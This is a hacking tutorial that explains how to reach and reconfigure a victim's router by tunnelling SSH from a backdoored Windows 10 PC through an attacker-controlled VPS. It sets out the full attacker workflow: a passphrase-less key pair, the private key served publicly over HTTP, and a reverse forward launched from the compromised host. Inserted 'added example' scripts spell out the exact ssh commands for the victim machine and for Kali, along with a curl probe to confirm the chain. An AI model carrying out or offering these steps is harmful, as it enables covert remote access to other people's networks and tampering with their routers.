Without administrator privileges, installing additional software, or changing the Windows 10 firewall, an attacker can reconfigure a router and carry out a range of follow-on attacks. This is accomplished by forwarding requests from Kali through a backdoored Windows computer to the router gateway with simple SSH tunnels.
The attack outlined here uses the SSH -R (remote) and -L (local) port-forwarding options to build encrypted connections to and from the attacker's server. The diagram below is a simplified representation of the attack.
```
# Attack Topology

[Kali/Hacker]
      |
     SSH
      |
[Debian/Server]
      |
     SSH            +-> [Raspberry Pi on 192.168.1.2:8080]
      |             |
[Windows 10/Proxy] -+-> [Router/Target on 192.168.1.1:80]
                    |
                    +-> [Torrent Client on 192.168.1.3:8080]
```
These connections let the attacker forward requests through a virtual private server (Debian) and then through a compromised Windows 10 PC, ultimately reaching the router gateway's web interface. Other devices and ports on the network can be targeted through the Windows 10 computer in the same way, but this tutorial focuses on the router. An attacker who can reach the router's settings can do considerable damage.
The PowerShell payload, which runs on Windows 10, makes an outbound SSH connection to the attacker's server using the OpenSSH client that ships with Windows 10. That connection carries a remote (-R) forward: requests arriving at the forwarded port on the server are pushed back through Windows 10 to the router gateway. Because a remote forward binds on the server's loopback interface by default, the attacker also connects to the server and forwards that port locally (-L), using the Debian VPS and Windows 10 together as a two-hop forwarding chain.
Similar attacks can be carried out with Tor, which gives broader access to devices and ports on the target network. But I wanted a forwarding solution that requires no administrator rights, no third-party software, no open ports on Windows 10 and no firewall changes.
The environment can also be set up with Kali Linux and Windows 10 on the same Wi-Fi network. In that scenario the attacker would reach a service through the Windows 10 IP address to bypass IP filtering or whitelisting. That is a narrow and less practical case, so this demonstration uses a virtual private server instead, letting an attacker reach the router remotely through the two systems from any network in the world.
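The two hops described above, written out as the concrete ssh invocations each side would run. This is an added example and not code from the original article: the listening ports 9999 (on the VPS loopback) and 8080 (on Kali), the key paths and the curl probe are assumptions chosen for illustration; the server address 126.96.36.199 and the router at 192.168.1.1:80 are the article's.

```shell
#!/bin/sh
# Added example (not from the original article): the two SSH hops that make up
# the forwarding chain.  Ports 9999/8080 and the key paths are assumptions.

SERVER=126.96.36.199
SERVER_USER=root
ROUTER=192.168.1.1
ROUTER_PORT=80
SERVER_LISTEN=9999      # port opened on the VPS loopback by the -R forward
KALI_LISTEN=8080        # port opened on Kali by the -L forward

# Hop 1, run on the compromised Windows 10 host with the built-in ssh.exe:
# a reverse forward so that 127.0.0.1:9999 on the VPS reaches the router's
# web interface through the Windows machine.
#   -N                        no remote shell, forward only
#   -o BatchMode=yes          never fall back to a prompt the payload cannot answer
#   -o StrictHostKeyChecking  do not stall on the unknown-host question
#   -o ExitOnForwardFailure   die instead of silently running without the forward
#   -o ServerAliveInterval    keep NAT/firewall state alive on a long-lived tunnel
reverse_forward_cmd() {
    printf 'ssh -N -i %s -o BatchMode=yes -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -R %s:%s:%s %s@%s' \
        "$1" "$SERVER_LISTEN" "$ROUTER" "$ROUTER_PORT" "$SERVER_USER" "$SERVER"
}

# Hop 2, run on Kali: a local forward so that 127.0.0.1:8080 on Kali reaches
# 127.0.0.1:9999 on the VPS, i.e. the far end of hop 1.  Needed because the
# -R port is bound on the server's loopback only (GatewayPorts defaults to no).
local_forward_cmd() {
    printf 'ssh -N -i %s -o ExitOnForwardFailure=yes -L %s:127.0.0.1:%s %s@%s' \
        "$1" "$KALI_LISTEN" "$SERVER_LISTEN" "$SERVER_USER" "$SERVER"
}

# With both hops up, the router's login page answers on Kali's loopback without
# any inbound port on the Windows firewall.  A 200 or 401 here means the chain works.
probe_router_cmd() {
    printf 'curl -s -o /dev/null -w "%%{http_code}" http://127.0.0.1:%s/' "$KALI_LISTEN"
}

# printf rather than echo: dash's echo would turn the \v in the Windows path into a vertical tab.
printf 'Windows 10:  %s\n' "$(reverse_forward_cmd 'C:\Users\victim\key')"
printf 'Kali:        %s\n' "$(local_forward_cmd '~/.ssh/key')"
printf 'Kali check:  %s\n' "$(probe_router_cmd)"
```

One caveat when running hop 1 on Windows: the Windows OpenSSH client, like the Unix one, refuses a private key whose permissions are too open, so the downloaded key must not be readable by other accounts on the machine or ssh.exe will exit before the forward is established.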
Step 1: Configure the Debian Server
First, SSH into the virtual private server that will act as the attacker's server, as root. The server's IP address is shown as 126.96.36.199 for the rest of this tutorial.
Create a new SSH key pair with the ssh-keygen command below. When prompted for a passphrase, leave it blank and press Enter. The passphrase must be empty for the attack to work: the PowerShell payload on Windows runs without a terminal and could never type one in.
By default, ssh-keygen proposes the file name "id_rsa". Change it to an unguessable string such as "ab56ab49226ed8603e9ae41e242d8096" so that directory crawlers and casual guessing cannot find the key once it is served over HTTP.
Warning: the file name "key" is used for the rest of this demonstration for simplicity, but it is bad practice. Anyone who can fetch the "key" file from the HTTP server set up below obtains the private key, and with it full root access to the Debian server.
```
~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/key
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/key.
Your public key has been saved in /root/.ssh/key.pub.
The key fingerprint is:
SHA256:5M9KVJVlW2o2er4MSaW0+5yyFhqhKm51kAfrt/fEnbA root@debian9
The key's randomart image is:
+---[RSA 2048]----+
|      .oo.       |
|     . ... +     |
|    +.  . . B    |
|   + o ....B.    |
|  . oS.  . *.    |
|   o.+ o.o.O.    |
|  . + ..ooE.+    |
|   o ....o.o=o   |
|   o .. ..ooo*   |
+----[SHA256]-----+
```
Then change into the ~/.ssh directory.

```
~# cd ~/.ssh
```

List the files in the directory; there should be a public key (.pub) and a private key.

```
~/.ssh# ls -la
-rw------- 1 root root 1675 Mar 24 05:26 key
-rw-r--r-- 1 root root  391 Mar 24 05:26 key.pub
```
Copy the public key to a file named "authorized_keys". That gives any SSH client (i.e., the Windows 10 machine) holding the private key the ability to authenticate to the SSH server. Note that cp overwrites the file; if authorized_keys already holds a key you still need, append with cat key.pub >> authorized_keys instead.

```
~/.ssh# cp key.pub authorized_keys
```
Edit the "sshd_config" file to disable password authentication. After the change, only clients holding the private key can authenticate to the server. This matters for two reasons: the non-interactive PowerShell session on Windows must never be dropped into a password prompt it cannot answer, and a server that is reachable from the whole internet should not accept password logins at all.

```
~/.ssh# nano /etc/ssh/sshd_config
```

Set the "PasswordAuthentication" option to "no", uncommenting the line if necessary. Save and exit nano with Ctrl+X, then Y and Enter.
Now restart the SSH service with systemctl.

```
~/.ssh# systemctl restart ssh
```
In the .ssh/ directory, create an empty "index.html" file so that the HTTP server started in the next step does not list the directory's contents. This only hides the key's file name; it does not stop anyone who knows the name from downloading it.

```
~/.ssh# touch index.html
```
Serve the keys over the internet with screen and python3 as shown below. Screen keeps the Python3 HTTP server running long after the SSH session is closed.

```
~/.ssh# screen python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 ...
```
To detach from the screen session without stopping the Python3 server, press Ctrl-A, then D. Then close the SSH session.
A few quick checks confirm that the server is configured correctly.
Open Firefox on a local Kali machine and navigate to the server's IP address or domain name. The page is blank because of the empty index.html file created earlier. Download the private key by appending /key to the URL.

[Image: Hacking Windows 10: Using SSH tunnels to forward requests and hack remote routers]
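The whole of Step 1 as a script that can be rehearsed against a scratch directory and a copy of sshd_config before it is pointed at /root/.ssh and /etc/ssh/sshd_config. This is an added example, not the article's own commands: it uses ed25519 instead of the article's default RSA, appends to authorized_keys rather than overwriting it, also closes ChallengeResponseAuthentication (otherwise PAM keyboard-interactive still offers a password prompt), and the scratch paths it creates are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original article): Step 1 as reusable shell
# functions, rehearsed in a temporary directory.  Key name "key" is the
# article's; the scratch paths are this example's assumptions.

set -u

# Generate a passphrase-less key pair.  The payload on Windows has no terminal,
# so a passphrase could never be entered.  ed25519 is used here; RSA works too.
make_keypair() {
    dir="$1"; name="$2"
    mkdir -p "$dir" && chmod 700 "$dir"
    ssh-keygen -q -t ed25519 -N "" -C "" -f "$dir/$name" </dev/null
}

# Append the public key to authorized_keys (the article's cp would overwrite
# any key already present) and set the permissions sshd insists on.
install_authorized_key() {
    pub="$1"; dir="$2"
    mkdir -p "$dir" && chmod 700 "$dir"
    touch "$dir/authorized_keys"
    grep -qxF "$(cat "$pub")" "$dir/authorized_keys" || cat "$pub" >>"$dir/authorized_keys"
    chmod 600 "$dir/authorized_keys"
}

# Turn off password logins.  A commented-out or existing directive is rewritten
# in place; a missing one is appended.  Idempotent, so it can be re-run safely.
harden_sshd_config() {
    cfg="$1"
    for directive in PasswordAuthentication ChallengeResponseAuthentication; do
        if grep -qE "^[[:space:]]*#?[[:space:]]*$directive[[:space:]]" "$cfg"; then
            sed -i -E "s/^[[:space:]]*#?[[:space:]]*$directive[[:space:]].*$/$directive no/" "$cfg"
        else
            echo "$directive no" >>"$cfg"
        fi
    done
}

# The empty index.html only stops python3 -m http.server from listing the
# directory; the key is still served to anyone who knows its URL.
prepare_key_webroot() {
    : >"$1/index.html"
}

# Rehearsal against a scratch directory; nothing under /etc or /root is touched.
demo() {
    tmp="$(mktemp -d)"
    # Constructed stand-in for /etc/ssh/sshd_config
    printf '#PasswordAuthentication yes\nPort 22\n' >"$tmp/sshd_config"
    harden_sshd_config "$tmp/sshd_config"
    if command -v ssh-keygen >/dev/null 2>&1; then
        make_keypair "$tmp/.ssh" key
        install_authorized_key "$tmp/.ssh/key.pub" "$tmp/.ssh"
        prepare_key_webroot "$tmp/.ssh"
    fi
    cat "$tmp/sshd_config"
    ls -laR "$tmp"
    rm -rf "$tmp"
}

demo
```

After running the real thing, confirm the change took effect with `sshd -T | grep -i passwordauthentication` before restarting the service, and then `systemctl restart ssh`; a typo in sshd_config otherwise locks you out of the server together with the payload.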